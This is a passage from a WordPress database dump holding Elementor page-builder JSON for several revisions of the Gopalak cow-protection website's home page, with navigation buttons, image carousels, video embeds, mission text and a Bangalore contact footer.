here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10160,1701,'_elementor_page_assets','a:0:{}'),(10162,1702,'_elementor_edit_mode','builder'),(10163,1702,'_elementor_template_type','wp-page'),(10164,1702,'_elementor_version','3.7.8'),(10165,1702,'_wp_page_template','elementor_canvas'),(10166,1702,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-11\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10167,1702,'_elementor_page_assets','a:0:{}'),(10170,1703,'_elementor_edit_mode','builder'),(10171,1703,'_elementor_template_type','wp-page'),(10172,1703,'_elementor_version','3.7.8'),(10173,1703,'_wp_page_template','elementor_canvas'),(10174,1703,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"b